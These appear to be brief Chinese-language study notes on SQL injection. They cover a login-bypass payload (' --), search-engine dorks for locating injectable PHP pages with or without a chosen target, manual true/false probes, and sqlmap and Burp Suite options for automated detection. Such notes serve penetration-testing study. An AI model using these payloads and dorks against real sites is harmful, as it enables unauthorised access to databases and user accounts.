万能密码
‘ --
中间有空格
where username='admin' and password='admin'
sql语句变了
where username='admin' --' and password = ''
如果表中有admin的用户名则有返回数据
寻找SQL注入点
无特定目标
inurl:.php?id=
有特定目标:
inurl:.php?id= site:target.com
工具爬取
spider,对搜索引擎和目标网站的链接进行爬取
注入识别
手工简单识别
'
and 1=1 / and 1=2
and '1'='1 / and '1'='2
and 1 like 1 / and 1 like 2
工具识别:
sqlmap -m fliename (fliename 中保存检测目标)
sqlmap --crawl (sqlmap对目标网站进行爬取,然后依次进行测试)
高级识别:
扩展识别广度和深度:
sqlmap --level 增加测试级别,对header中相关参数也进行测试
sqlmap -r filename (filename中为网站请求数据)
利用工具提高识别效率:
Burpsuite + Sqlamp
burpsuite拦截所有浏览器访问提交的数据
burpsuite扩展插件,直接调用sqlmap进行测试
一些tip
可以在参数后键入 “*” 来确定想要测试的参数
可能出现注入的点:新闻、登录、搜索、留言。。。
使用limit group等